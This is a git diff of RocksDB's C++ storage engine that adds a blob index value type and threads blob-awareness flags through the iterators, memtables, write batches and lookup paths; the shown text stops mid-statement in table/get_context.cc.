39c1d6103f9..76b52b8b83f 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -52,6 +52,7 @@ namespace rocksdb { +class ArenaWrappedDBIter; class MemTable; class TableCache; class Version; @@ -123,6 +124,7 @@ class DBImpl : public DB { ColumnFamilyHandle* column_family, const Slice& key, std::string* value, bool* value_found = nullptr) override; + using DB::NewIterator; virtual Iterator* NewIterator(const ReadOptions& options, ColumnFamilyHandle* column_family) override; @@ -130,6 +132,11 @@ class DBImpl : public DB { const ReadOptions& options, const std::vector& column_families, std::vector* iterators) override; + ArenaWrappedDBIter* NewIteratorImpl(const ReadOptions& options, + ColumnFamilyData* cfd, + SequenceNumber snapshot, + bool allow_blob = false); + virtual const Snapshot* GetSnapshot() override; virtual void ReleaseSnapshot(const Snapshot* snapshot) override; using DB::GetProperty; @@ -341,6 +348,8 @@ class DBImpl : public DB { return alive_log_files_.begin()->getting_flushed; } + Status TEST_SwitchMemtable(ColumnFamilyData* cfd = nullptr); + // Force current memtable contents to be flushed. Status TEST_FlushMemTable(bool wait = true, ColumnFamilyHandle* cfh = nullptr); @@ -644,7 +653,9 @@ class DBImpl : public DB { friend struct SuperVersion; friend class CompactedDBImpl; #ifndef NDEBUG + friend class DBTest2_ReadCallbackTest_Test; friend class XFTransactionWriteHandler; + friend class DBBlobIndexTest; #endif struct CompactionState; @@ -1245,7 +1256,7 @@ class DBImpl : public DB { // Note: 'value_found' from KeyMayExist propagates here Status GetImpl(const ReadOptions& options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value, - bool* value_found = nullptr); + bool* value_found = nullptr, bool* is_blob_index = nullptr); bool GetIntPropertyInternal(ColumnFamilyData* cfd, const DBPropertyInfo& property_info, diff --git a/db/db_impl_debug.cc b/db/db_impl_debug.cc index de5b66f2a6c..a4b378020aa 100644 --- a/db/db_impl_debug.cc +++ b/db/db_impl_debug.cc @@ -80,6 +80,15 @@ Status DBImpl::TEST_CompactRange(int level, const Slice* begin, disallow_trivial_move); } +Status DBImpl::TEST_SwitchMemtable(ColumnFamilyData* cfd) { + WriteContext write_context; + InstrumentedMutexLock l(&mutex_); + if (cfd == nullptr) { + cfd = default_cf_handle_->cfd(); + } + return SwitchMemtable(cfd, &write_context); +} + Status DBImpl::TEST_FlushMemTable(bool wait, ColumnFamilyHandle* cfh) { FlushOptions fo; fo.wait = wait; diff --git a/db/db_iter.cc b/db/db_iter.cc index 33f926ce07f..e4a6c92a7dd 100644 --- a/db/db_iter.cc +++ b/db/db_iter.cc @@ -8,8 +8,6 @@ // found in the LICENSE file. See the AUTHORS file for names of contributors. #include "db/db_iter.h" -#include -#include #include #include @@ -18,7 +16,6 @@ #include "db/merge_helper.h" #include "db/pinned_iterators_manager.h" #include "monitoring/perf_context_imp.h" -#include "port/port.h" #include "rocksdb/env.h" #include "rocksdb/iterator.h" #include "rocksdb/merge_operator.h" @@ -105,7 +102,7 @@ class DBIter: public Iterator { DBIter(Env* _env, const ReadOptions& read_options, const ImmutableCFOptions& cf_options, const Comparator* cmp, InternalIterator* iter, SequenceNumber s, bool arena_mode, - uint64_t max_sequential_skip_in_iterations) + uint64_t max_sequential_skip_in_iterations, bool allow_blob) : arena_mode_(arena_mode), env_(_env), logger_(cf_options.info_log), @@ -122,7 +119,8 @@ class DBIter: public Iterator { pin_thru_lifetime_(read_options.pin_data), total_order_seek_(read_options.total_order_seek), range_del_agg_(cf_options.internal_comparator, s, - true /* collapse_deletions */) { + true /* collapse_deletions */), + allow_blob_(allow_blob) { RecordTick(statistics_, NO_ITERATORS); prefix_extractor_ = cf_options.prefix_extractor; max_skip_ = max_sequential_skip_in_iterations; @@ -180,6 +178,10 @@ class DBIter: public Iterator { return status_; } } + bool IsBlob() const { + assert(valid_ && (allow_blob_ || !is_blob_)); + return is_blob_; + } virtual Status GetProperty(std::string prop_name, std::string* prop) override { @@ -287,6 +289,8 @@ class DBIter: public Iterator { RangeDelAggregator range_del_agg_; LocalStatistics local_stats_; PinnedIteratorsManager pinned_iters_mgr_; + bool allow_blob_; + bool is_blob_; // No copying allowed DBIter(const DBIter&); @@ -376,6 +380,8 @@ void DBIter::FindNextUserEntryInternal(bool skipping, bool prefix_check) { // - none of the above : saved_key_ can contain anything, it doesn't matter. uint64_t num_skipped = 0; + is_blob_ = false; + do { ParsedInternalKey ikey; @@ -420,6 +426,7 @@ void DBIter::FindNextUserEntryInternal(bool skipping, bool prefix_check) { PERF_COUNTER_ADD(internal_delete_skipped_count, 1); break; case kTypeValue: + case kTypeBlobIndex: saved_key_.SetUserKey( ikey.user_key, !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */); @@ -431,6 +438,18 @@ void DBIter::FindNextUserEntryInternal(bool skipping, bool prefix_check) { skipping = true; num_skipped = 0; PERF_COUNTER_ADD(internal_delete_skipped_count, 1); + } else if (ikey.type == kTypeBlobIndex) { + if (!allow_blob_) { + ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index."); + status_ = Status::NotSupported( + "Encounter unexpected blob index. Please open DB with " + "rocksdb::blob_db::BlobDB instead."); + valid_ = false; + } else { + is_blob_ = true; + valid_ = true; + } + return; } else { valid_ = true; return; @@ -572,6 +591,18 @@ void DBIter::MergeValuesNewToOld() { merge_context_.PushOperand(iter_->value(), iter_->IsValuePinned() /* operand_pinned */); PERF_COUNTER_ADD(internal_merge_count, 1); + } else if (kTypeBlobIndex == ikey.type) { + if (!allow_blob_) { + ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index."); + status_ = Status::NotSupported( + "Encounter unexpected blob index. Please open DB with " + "rocksdb::blob_db::BlobDB instead."); + } else { + status_ = + Status::NotSupported("Blob DB does not support merge operator."); + } + valid_ = false; + return; } else { assert(false); } @@ -678,7 +709,6 @@ void DBIter::PrevInternal() { !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */); if (FindValueForCurrentKey()) { - valid_ = true; if (!iter_->Valid()) { return; } @@ -745,6 +775,7 @@ bool DBIter::FindValueForCurrentKey() { last_key_entry_type = ikey.type; switch (last_key_entry_type) { case kTypeValue: + case kTypeBlobIndex: if (range_del_agg_.ShouldDelete( ikey, RangeDelAggregator::RangePositioningMode::kBackwardTraversal)) { @@ -790,6 +821,7 @@ bool DBIter::FindValueForCurrentKey() { } Status s; + is_blob_ = false; switch (last_key_entry_type) { case kTypeDeletion: case kTypeSingleDeletion: @@ -805,6 +837,18 @@ bool DBIter::FindValueForCurrentKey() { merge_operator_, saved_key_.GetUserKey(), nullptr, merge_context_.GetOperands(), &saved_value_, logger_, statistics_, env_, &pinned_value_, true); + } else if (last_not_merge_type == kTypeBlobIndex) { + if (!allow_blob_) { + ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index."); + status_ = Status::NotSupported( + "Encounter unexpected blob index. Please open DB with " + "rocksdb::blob_db::BlobDB instead."); + } else { + status_ = + Status::NotSupported("Blob DB does not support merge operator."); + } + valid_ = false; + return true; } else { assert(last_not_merge_type == kTypeValue); s = MergeHelper::TimedFullMerge( @@ -816,6 +860,17 @@ bool DBIter::FindValueForCurrentKey() { case kTypeValue: // do nothing - we've already has value in saved_value_ break; + case kTypeBlobIndex: + if (!allow_blob_) { + ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index."); + status_ = Status::NotSupported( + "Encounter unexpected blob index. Please open DB with " + "rocksdb::blob_db::BlobDB instead."); + valid_ = false; + return true; + } + is_blob_ = true; + break; default: assert(false); break; @@ -849,7 +904,15 @@ bool DBIter::FindValueForCurrentKeyUsingSeek() { valid_ = false; return false; } - if (ikey.type == kTypeValue) { + if (ikey.type == kTypeBlobIndex && !allow_blob_) { + ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index."); + status_ = Status::NotSupported( + "Encounter unexpected blob index. Please open DB with " + "rocksdb::blob_db::BlobDB instead."); + valid_ = false; + return true; + } + if (ikey.type == kTypeValue || ikey.type == kTypeBlobIndex) { assert(iter_->IsValuePinned()); pinned_value_ = iter_->value(); valid_ = true; @@ -1160,10 +1223,11 @@ Iterator* NewDBIterator(Env* env, const ReadOptions& read_options, const Comparator* user_key_comparator, InternalIterator* internal_iter, const SequenceNumber& sequence, - uint64_t max_sequential_skip_in_iterations) { - DBIter* db_iter = new DBIter(env, read_options, cf_options, - user_key_comparator, internal_iter, sequence, - false, max_sequential_skip_in_iterations); + uint64_t max_sequential_skip_in_iterations, + bool allow_blob) { + DBIter* db_iter = new DBIter( + env, read_options, cf_options, user_key_comparator, internal_iter, + sequence, false, max_sequential_skip_in_iterations, allow_blob); return db_iter; } @@ -1191,6 +1255,7 @@ inline void ArenaWrappedDBIter::Prev() { db_iter_->Prev(); } inline Slice ArenaWrappedDBIter::key() const { return db_iter_->key(); } inline Slice ArenaWrappedDBIter::value() const { return db_iter_->value(); } inline Status ArenaWrappedDBIter::status() const { return db_iter_->status(); } +bool ArenaWrappedDBIter::IsBlob() const { return db_iter_->IsBlob(); } inline Status ArenaWrappedDBIter::GetProperty(std::string prop_name, std::string* prop) { if (prop_name == "rocksdb.iterator.super-version-number") { @@ -1207,11 +1272,11 @@ void ArenaWrappedDBIter::Init(Env* env, const ReadOptions& read_options, const ImmutableCFOptions& cf_options, const SequenceNumber& sequence, uint64_t max_sequential_skip_in_iteration, - uint64_t version_number) { + uint64_t version_number, bool allow_blob) { auto mem = arena_.AllocateAligned(sizeof(DBIter)); db_iter_ = new (mem) DBIter(env, read_options, cf_options, cf_options.user_comparator, nullptr, - sequence, true, max_sequential_skip_in_iteration); + sequence, true, max_sequential_skip_in_iteration, allow_blob); sv_number_ = version_number; } @@ -1231,7 +1296,7 @@ Status ArenaWrappedDBIter::Refresh() { SuperVersion* sv = cfd_->GetReferencedSuperVersion(db_impl_->mutex()); Init(env, read_options_, *(cfd_->ioptions()), latest_seq, sv->mutable_cf_options.max_sequential_skip_in_iterations, - cur_sv_number); + cur_sv_number, allow_blob_); InternalIterator* internal_iter = db_impl_->NewInternalIterator( read_options_, cfd_, sv, &arena_, db_iter_->GetRangeDelAggregator()); @@ -1247,12 +1312,12 @@ ArenaWrappedDBIter* NewArenaWrappedDbIterator( Env* env, const ReadOptions& read_options, const ImmutableCFOptions& cf_options, const SequenceNumber& sequence, uint64_t max_sequential_skip_in_iterations, uint64_t version_number, - DBImpl* db_impl, ColumnFamilyData* cfd) { + DBImpl* db_impl, ColumnFamilyData* cfd, bool allow_blob) { ArenaWrappedDBIter* iter = new ArenaWrappedDBIter(); iter->Init(env, read_options, cf_options, sequence, - max_sequential_skip_in_iterations, version_number); + max_sequential_skip_in_iterations, version_number, allow_blob); if (db_impl != nullptr && cfd != nullptr) { - iter->StoreRefreshInfo(read_options, db_impl, cfd); + iter->StoreRefreshInfo(read_options, db_impl, cfd, allow_blob); } return iter; diff --git a/db/db_iter.h b/db/db_iter.h index ea98ff4332a..26fcd44cbd2 100644 --- a/db/db_iter.h +++ b/db/db_iter.h @@ -33,7 +33,8 @@ extern Iterator* NewDBIterator(Env* env, const ReadOptions& read_options, const Comparator* user_key_comparator, InternalIterator* internal_iter, const SequenceNumber& sequence, - uint64_t max_sequential_skip_in_iterations); + uint64_t max_sequential_skip_in_iterations, + bool allow_blob = false); // A wrapper iterator which wraps DB Iterator and the arena, with which the DB // iterator is supposed be allocated. This class is used as an entry point of @@ -63,20 +64,22 @@ class ArenaWrappedDBIter : public Iterator { virtual Slice value() const override; virtual Status status() const override; virtual Status Refresh() override; + bool IsBlob() const; virtual Status GetProperty(std::string prop_name, std::string* prop) override; void Init(Env* env, const ReadOptions& read_options, const ImmutableCFOptions& cf_options, const SequenceNumber& sequence, - uint64_t max_sequential_skip_in_iterations, - uint64_t version_number); + uint64_t max_sequential_skip_in_iterations, uint64_t version_number, + bool allow_blob); void StoreRefreshInfo(const ReadOptions& read_options, DBImpl* db_impl, - ColumnFamilyData* cfd) { + ColumnFamilyData* cfd, bool allow_blob) { read_options_ = read_options; db_impl_ = db_impl; cfd_ = cfd; + allow_blob_ = allow_blob; } private: @@ -86,6 +89,7 @@ class ArenaWrappedDBIter : public Iterator { ColumnFamilyData* cfd_ = nullptr; DBImpl* db_impl_ = nullptr; ReadOptions read_options_; + bool allow_blob_ = false; }; // Generate the arena wrapped iterator class. @@ -95,6 +99,7 @@ extern ArenaWrappedDBIter* NewArenaWrappedDbIterator( Env* env, const ReadOptions& read_options, const ImmutableCFOptions& cf_options, const SequenceNumber& sequence, uint64_t max_sequential_skip_in_iterations, uint64_t version_number, - DBImpl* db_impl = nullptr, ColumnFamilyData* cfd = nullptr); + DBImpl* db_impl = nullptr, ColumnFamilyData* cfd = nullptr, + bool allow_blob = false); } // namespace rocksdb diff --git a/db/dbformat.cc b/db/dbformat.cc index 20c54495aa0..f287ae9f4e0 100644 --- a/db/dbformat.cc +++ b/db/dbformat.cc @@ -27,7 +27,7 @@ namespace rocksdb { // and the value type is embedded as the low 8 bits in the sequence // number in internal keys, we need to use the highest-numbered // ValueType, not the lowest). -const ValueType kValueTypeForSeek = kTypeSingleDeletion; +const ValueType kValueTypeForSeek = kTypeBlobIndex; const ValueType kValueTypeForSeekForPrev = kTypeDeletion; uint64_t PackSequenceAndType(uint64_t seq, ValueType t) { diff --git a/db/dbformat.h b/db/dbformat.h index d9fd5f3997b..c58b8363ab5 100644 --- a/db/dbformat.h +++ b/db/dbformat.h @@ -47,6 +47,8 @@ enum ValueType : unsigned char { kTypeNoop = 0xD, // WAL only. kTypeColumnFamilyRangeDeletion = 0xE, // WAL only. kTypeRangeDeletion = 0xF, // meta block + kTypeColumnFamilyBlobIndex = 0x10, // Blob DB only + kTypeBlobIndex = 0x11, // Blob DB only kMaxValue = 0x7F // Not used for storing records. }; @@ -57,7 +59,7 @@ extern const ValueType kValueTypeForSeekForPrev; // Checks whether a type is an inline value type // (i.e. a type used in memtable skiplist and sst file datablock). inline bool IsValueType(ValueType t) { - return t <= kTypeMerge || t == kTypeSingleDeletion; + return t <= kTypeMerge || t == kTypeSingleDeletion || t == kTypeBlobIndex; } // Checks whether a type is from user operation diff --git a/db/memtable.cc b/db/memtable.cc index 9f2fd20bb50..22b4125e075 100644 --- a/db/memtable.cc +++ b/db/memtable.cc @@ -555,6 +555,7 @@ struct Saver { Statistics* statistics; bool inplace_update_support; Env* env_; + bool* is_blob_index; }; } // namespace @@ -584,11 +585,26 @@ static bool SaveValue(void* arg, const char* entry) { ValueType type; UnPackSequenceAndType(tag, &s->seq, &type); - if ((type == kTypeValue || type == kTypeMerge) && + if ((type == kTypeValue || type == kTypeMerge || type == kTypeBlobIndex) && range_del_agg->ShouldDelete(Slice(key_ptr, key_length))) { type = kTypeRangeDeletion; } switch (type) { + case kTypeBlobIndex: + if (s->is_blob_index == nullptr) { + ROCKS_LOG_ERROR(s->logger, "Encounter unexpected blob index."); + *(s->status) = Status::NotSupported( + "Encounter unsupported blob value. Please open DB with " + "rocksdb::blob_db::BlobDB instead."); + } else if (*(s->merge_in_progress)) { + *(s->status) = + Status::NotSupported("Blob DB does not support merge operator."); + } + if (!s->status->ok()) { + *(s->found_final_value) = true; + return false; + } + // intentional fallthrough case kTypeValue: { if (s->inplace_update_support) { s->mem->GetLock(s->key->user_key())->ReadLock(); @@ -607,6 +623,9 @@ static bool SaveValue(void* arg, const char* entry) { s->mem->GetLock(s->key->user_key())->ReadUnlock(); } *(s->found_final_value) = true; + if (s->is_blob_index != nullptr) { + *(s->is_blob_index) = (type == kTypeBlobIndex); + } return false; } case kTypeDeletion: @@ -653,7 +672,7 @@ static bool SaveValue(void* arg, const char* entry) { bool MemTable::Get(const LookupKey& key, std::string* value, Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg, SequenceNumber* seq, - const ReadOptions& read_opts) { + const ReadOptions& read_opts, bool* is_blob_index) { // The sequence number is updated synchronously in version_set.h if (IsEmpty()) { // Avoiding recording stats for speed. @@ -699,6 +718,7 @@ bool MemTable::Get(const LookupKey& key, std::string* value, Status* s, saver.inplace_update_support = moptions_.inplace_update_support; saver.statistics = moptions_.statistics; saver.env_ = env_; + saver.is_blob_index = is_blob_index; table_->Get(key, &saver, SaveValue); *seq = saver.seq; diff --git a/db/memtable.h b/db/memtable.h index 9669a2157c4..89679248425 100644 --- a/db/memtable.h +++ b/db/memtable.h @@ -187,13 +187,15 @@ class MemTable { // status returned indicates a corruption or other unexpected error. bool Get(const LookupKey& key, std::string* value, Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg, - SequenceNumber* seq, const ReadOptions& read_opts); + SequenceNumber* seq, const ReadOptions& read_opts, + bool* is_blob_index = nullptr); bool Get(const LookupKey& key, std::string* value, Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg, - const ReadOptions& read_opts) { + const ReadOptions& read_opts, bool* is_blob_index = nullptr) { SequenceNumber seq; - return Get(key, value, s, merge_context, range_del_agg, &seq, read_opts); + return Get(key, value, s, merge_context, range_del_agg, &seq, read_opts, + is_blob_index); } // Attempts to update the new_value inplace, else does normal Add diff --git a/db/memtable_list.cc b/db/memtable_list.cc index c9a927c062f..a9d9e1c0226 100644 --- a/db/memtable_list.cc +++ b/db/memtable_list.cc @@ -104,10 +104,10 @@ int MemTableList::NumFlushed() const { bool MemTableListVersion::Get(const LookupKey& key, std::string* value, Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg, - SequenceNumber* seq, - const ReadOptions& read_opts) { + SequenceNumber* seq, const ReadOptions& read_opts, + bool* is_blob_index) { return GetFromList(&memlist_, key, value, s, merge_context, range_del_agg, - seq, read_opts); + seq, read_opts, is_blob_index); } bool MemTableListVersion::GetFromHistory(const LookupKey& key, @@ -120,19 +120,17 @@ bool MemTableListVersion::GetFromHistory(const LookupKey& key, range_del_agg, seq, read_opts); } -bool MemTableListVersion::GetFromList(std::list* list, - const LookupKey& key, std::string* value, - Status* s, MergeContext* merge_context, - RangeDelAggregator* range_del_agg, - SequenceNumber* seq, - const ReadOptions& read_opts) { +bool MemTableListVersion::GetFromList( + std::list* list, const LookupKey& key, std::string* value, + Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg, + SequenceNumber* seq, const ReadOptions& read_opts, bool* is_blob_index) { *seq = kMaxSequenceNumber; for (auto& memtable : *list) { SequenceNumber current_seq = kMaxSequenceNumber; bool done = memtable->Get(key, value, s, merge_context, range_del_agg, - ¤t_seq, read_opts); + ¤t_seq, read_opts, is_blob_index); if (*seq == kMaxSequenceNumber) { // Store the most recent sequence number of any operation on this key. // Since we only care about the most recent change, we only need to diff --git a/db/memtable_list.h b/db/memtable_list.h index 628ab544b6c..23b5bbe558b 100644 --- a/db/memtable_list.h +++ b/db/memtable_list.h @@ -54,13 +54,15 @@ class MemTableListVersion { // returned). Otherwise, *seq will be set to kMaxSequenceNumber. bool Get(const LookupKey& key, std::string* value, Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg, - SequenceNumber* seq, const ReadOptions& read_opts); + SequenceNumber* seq, const ReadOptions& read_opts, + bool* is_blob_index = nullptr); bool Get(const LookupKey& key, std::string* value, Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg, - const ReadOptions& read_opts) { + const ReadOptions& read_opts, bool* is_blob_index = nullptr) { SequenceNumber seq; - return Get(key, value, s, merge_context, range_del_agg, &seq, read_opts); + return Get(key, value, s, merge_context, range_del_agg, &seq, read_opts, + is_blob_index); } // Similar to Get(), but searches the Memtable history of memtables that @@ -117,7 +119,7 @@ class MemTableListVersion { bool GetFromList(std::list* list, const LookupKey& key, std::string* value, Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg, SequenceNumber* seq, - const ReadOptions& read_opts); + const ReadOptions& read_opts, bool* is_blob_index = nullptr); void AddMemTable(MemTable* m); diff --git a/db/version_set.cc b/db/version_set.cc index 2ff425d2019..782ebc263eb 100644 --- a/db/version_set.cc +++ b/db/version_set.cc @@ -965,7 +965,7 @@ void Version::Get(const ReadOptions& read_options, const LookupKey& k, PinnableSlice* value, Status* status, MergeContext* merge_context, RangeDelAggregator* range_del_agg, bool* value_found, - bool* key_exists, SequenceNumber* seq) { + bool* key_exists, SequenceNumber* seq, bool* is_blob) { Slice ikey = k.internal_key(); Slice user_key = k.user_key(); @@ -981,7 +981,7 @@ void Version::Get(const ReadOptions& read_options, const LookupKey& k, user_comparator(), merge_operator_, info_log_, db_statistics_, status->ok() ? GetContext::kNotFound : GetContext::kMerge, user_key, value, value_found, merge_context, range_del_agg, this->env_, seq, - merge_operator_ ? &pinned_iters_mgr : nullptr); + merge_operator_ ? &pinned_iters_mgr : nullptr, is_blob); // Pin blocks that we read to hold merge operands if (merge_operator_) { @@ -1030,6 +1030,12 @@ void Version::Get(const ReadOptions& read_options, const LookupKey& k, return; case GetContext::kMerge: break; + case GetContext::kBlobIndex: + ROCKS_LOG_ERROR(info_log_, "Encounter unexpected blob index."); + *status = Status::NotSupported( + "Encounter unexpected blob index. Please open DB with " + "rocksdb::blob_db::BlobDB instead."); + return; } f = fp.GetNextFile(); } diff --git a/db/version_set.h b/db/version_set.h index 9fb000c058b..5862dea3350 100644 --- a/db/version_set.h +++ b/db/version_set.h @@ -485,7 +485,8 @@ class Version { void Get(const ReadOptions&, const LookupKey& key, PinnableSlice* value, Status* status, MergeContext* merge_context, RangeDelAggregator* range_del_agg, bool* value_found = nullptr, - bool* key_exists = nullptr, SequenceNumber* seq = nullptr); + bool* key_exists = nullptr, SequenceNumber* seq = nullptr, + bool* is_blob = nullptr); // Loads some stats information from files. Call without mutex held. It needs // to be called before applying the version to the version set. diff --git a/db/write_batch.cc b/db/write_batch.cc index 43639ac2320..89ae044c8b2 100644 --- a/db/write_batch.cc +++ b/db/write_batch.cc @@ -67,6 +67,7 @@ enum ContentFlags : uint32_t { HAS_COMMIT = 1 << 7, HAS_ROLLBACK = 1 << 8, HAS_DELETE_RANGE = 1 << 9, + HAS_BLOB_INDEX = 1 << 10, }; struct BatchContentClassifier : public WriteBatch::Handler { @@ -97,6 +98,11 @@ struct BatchContentClassifier : public WriteBatch::Handler { return Status::OK(); } + Status PutBlobIndexCF(uint32_t, const Slice&, const Slice&) override { + content_flags |= ContentFlags::HAS_BLOB_INDEX; + return Status::OK(); + } + Status MarkBeginPrepare() override { content_flags |= ContentFlags::HAS_BEGIN_PREPARE; return Status::OK(); @@ -328,6 +334,17 @@ Status ReadRecordFromWriteBatch(Slice* input, char* tag, return Status::Corruption("bad WriteBatch Merge"); } break; + case kTypeColumnFamilyBlobIndex: + if (!GetVarint32(input, column_family)) { + return Status::Corruption("bad WriteBatch BlobIndex"); + } + // intentional fallthrough + case kTypeBlobIndex: + if (!GetLengthPrefixedSlice(input, key) || + !GetLengthPrefixedSlice(input, value)) { + return Status::Corruption("bad WriteBatch BlobIndex"); + } + break; case kTypeLogData: assert(blob != nullptr); if (!GetLengthPrefixedSlice(input, blob)) { @@ -414,6 +431,13 @@ Status WriteBatch::Iterate(Handler* handler) const { s = handler->MergeCF(column_family, key, value); found++; break; + case kTypeColumnFamilyBlobIndex: + case kTypeBlobIndex: + assert(content_flags_.load(std::memory_order_relaxed) & + (ContentFlags::DEFERRED | ContentFlags::HAS_BLOB_INDEX)); + s = handler->PutBlobIndexCF(column_family, key, value); + found++; + break; case kTypeLogData: handler->LogData(blob); break; @@ -759,6 +783,25 @@ Status WriteBatch::Merge(ColumnFamilyHandle* column_family, value); } +Status WriteBatchInternal::PutBlobIndex(WriteBatch* b, + uint32_t column_family_id, + const Slice& key, const Slice& value) { + LocalSavePoint save(b); + WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1); + if (column_family_id == 0) { + b->rep_.push_back(static_cast(kTypeBlobIndex)); + } else { + b->rep_.push_back(static_cast(kTypeColumnFamilyBlobIndex)); + PutVarint32(&b->rep_, column_family_id); + } + PutLengthPrefixedSlice(&b->rep_, key); + PutLengthPrefixedSlice(&b->rep_, value); + b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) | + ContentFlags::HAS_BLOB_INDEX, + std::memory_order_relaxed); + return save.commit(); +} + Status WriteBatch::PutLogData(const Slice& blob) { LocalSavePoint save(this); rep_.push_back(static_cast(kTypeLogData)); @@ -935,8 +978,8 @@ class MemTableInserter : public WriteBatch::Handler { return true; } - virtual Status PutCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + Status PutCFImpl(uint32_t column_family_id, const Slice& key, + const Slice& value, ValueType value_type) { if (rebuilding_trx_ != nullptr) { WriteBatchInternal::Put(rebuilding_trx_, column_family_id, key, value); return Status::OK(); @@ -951,7 +994,7 @@ class MemTableInserter : public WriteBatch::Handler { MemTable* mem = cf_mems_->GetMemTable(); auto* moptions = mem->GetMemTableOptions(); if (!moptions->inplace_update_support) { - mem->Add(sequence_, kTypeValue, key, value, concurrent_memtable_writes_, + mem->Add(sequence_, value_type, key, value, concurrent_memtable_writes_, get_post_process_info(mem)); } else if (moptions->inplace_callback == nullptr) { assert(!concurrent_memtable_writes_); @@ -986,11 +1029,11 @@ class MemTableInserter : public WriteBatch::Handler { value, &merged_value); if (status == UpdateStatus::UPDATED_INPLACE) { // prev_value is updated in-place with final value. - mem->Add(sequence_, kTypeValue, key, Slice(prev_buffer, prev_size)); + mem->Add(sequence_, value_type, key, Slice(prev_buffer, prev_size)); RecordTick(moptions->statistics, NUMBER_KEYS_WRITTEN); } else if (status == UpdateStatus::UPDATED) { // merged_value contains the final value. - mem->Add(sequence_, kTypeValue, key, Slice(merged_value)); + mem->Add(sequence_, value_type, key, Slice(merged_value)); RecordTick(moptions->statistics, NUMBER_KEYS_WRITTEN); } } @@ -1003,6 +1046,11 @@ class MemTableInserter : public WriteBatch::Handler { return Status::OK(); } + virtual Status PutCF(uint32_t column_family_id, const Slice& key, + const Slice& value) override { + return PutCFImpl(column_family_id, key, value, kTypeValue); + } + Status DeleteImpl(uint32_t column_family_id, const Slice& key, const Slice& value, ValueType delete_type) { MemTable* mem = cf_mems_->GetMemTable(); @@ -1159,6 +1207,12 @@ class MemTableInserter : public WriteBatch::Handler { return Status::OK(); } + virtual Status PutBlobIndexCF(uint32_t column_family_id, const Slice& key, + const Slice& value) override { + // Same as PutCF except for value type. + return PutCFImpl(column_family_id, key, value, kTypeBlobIndex); + } + void CheckMemtableFull() { if (flush_scheduler_ != nullptr) { auto* cfd = cf_mems_->current(); diff --git a/db/write_batch_internal.h b/db/write_batch_internal.h index 48a417ce877..2408686f12b 100644 --- a/db/write_batch_internal.h +++ b/db/write_batch_internal.h @@ -99,6 +99,9 @@ class WriteBatchInternal { static Status Merge(WriteBatch* batch, uint32_t column_family_id, const SliceParts& key, const SliceParts& value); + static Status PutBlobIndex(WriteBatch* batch, uint32_t column_family_id, + const Slice& key, const Slice& value); + static Status MarkEndPrepare(WriteBatch* batch, const Slice& xid); static Status MarkRollback(WriteBatch* batch, const Slice& xid); diff --git a/include/rocksdb/listener.h b/include/rocksdb/listener.h index 40d318e0941..e132033db2a 100644 --- a/include/rocksdb/listener.h +++ b/include/rocksdb/listener.h @@ -206,6 +206,7 @@ class CompactionEventListener { kDelete, kSingleDelete, kRangeDelete, + kBlobIndex, kInvalid, }; diff --git a/include/rocksdb/write_batch.h b/include/rocksdb/write_batch.h index 8bd93d36c4e..336391ead56 100644 --- a/include/rocksdb/write_batch.h +++ b/include/rocksdb/write_batch.h @@ -233,6 +233,12 @@ class WriteBatch : public WriteBatchBase { } virtual void Merge(const Slice& /*key*/, const Slice& /*value*/) {} + virtual Status PutBlobIndexCF(uint32_t /*column_family_id*/, + const Slice& /*key*/, + const Slice& /*value*/) { + return Status::InvalidArgument("PutBlobIndexCF not implemented"); + } + // The default implementation of LogData does nothing. virtual void LogData(const Slice& blob); diff --git a/table/get_context.cc b/table/get_context.cc index 0d688fe4609..258891ec4c3 100644 --- a/table/get_context.cc +++ b/table/get_context.cc @@ -33,14 +33,12 @@ void appendToReplayLog(std::string* replay_log, ValueType type, Slice value) { } // namespace -GetContext::GetContext(const Comparator* ucmp, - const MergeOperator* merge_operator, Logger* logger, - Statistics* statistics, GetState init_state, - const Slice& user_key, PinnableSlice* pinnable_val, - bool* value_found, MergeContext* merge_context, - RangeDelAggregator* _range_del_agg, Env* env, - SequenceNumber* seq, - PinnedIteratorsManager* _pinned_iters_mgr) +GetContext::GetContext( + const Comparator* ucmp, const MergeOperator* merge_operator, Logger* logger, + Statistics* statistics, GetState init_state, const Slice& user_key, + PinnableSlice* pinnable_val, bool* value_found, MergeContext* merge_context, + RangeDelAggregator* _range_del_agg, Env* env, SequenceNumber* seq, + PinnedIteratorsManager* _pinned_iters_mgr, bool* is_blob_index) : ucmp_(ucmp), merge_operator_(merge_operator), logger_(logger), @@ -54,7 +52,8 @@ GetContext::GetContext(const Comparator* ucmp, env_(env), seq_(seq), replay_log_(nullptr), - pinned_iters_mgr_(_pinned_iters_mgr) { + pinned_iters_mgr_(_pinned_iters_mgr), + is_blob_index_(is_blob_index) { if (seq_) { *seq_ = kMaxSequenceNumber; } @@ -99,13 +98,19 @@ bool GetContext::SaveValue(const ParsedInternalKey& parsed_key, auto type = parsed_key.type; // Key matches. Process it - if ((type == kTypeValue || type == kTypeMerge) && + if ((type == kTypeValue || type == kTypeMerge || type == kTypeBlobIndex) && range_del_agg_ != nullptr && range_del_agg_->ShouldDelete(parsed_key)) { type = kTypeRangeDeletion; } switch (type) { case kTypeValue: + case kTypeBlobIndex: assert(state_ == kNotFound || state_ == kMerge); + if (type == kTypeBlobIndex && is_blob_index_ == nullptr) { + // Blob value not supported. Stop. + state_ = kBlobIndex; + return false; + } if (kNotFound == state_) { state_ = kFound; if (LIKELY(pinnable_val_ != nullptr)) { @@ -131,6 +136,9 @@ bool GetContext::SaveValue(const ParsedInternalKey& parsed_key, } } } + if 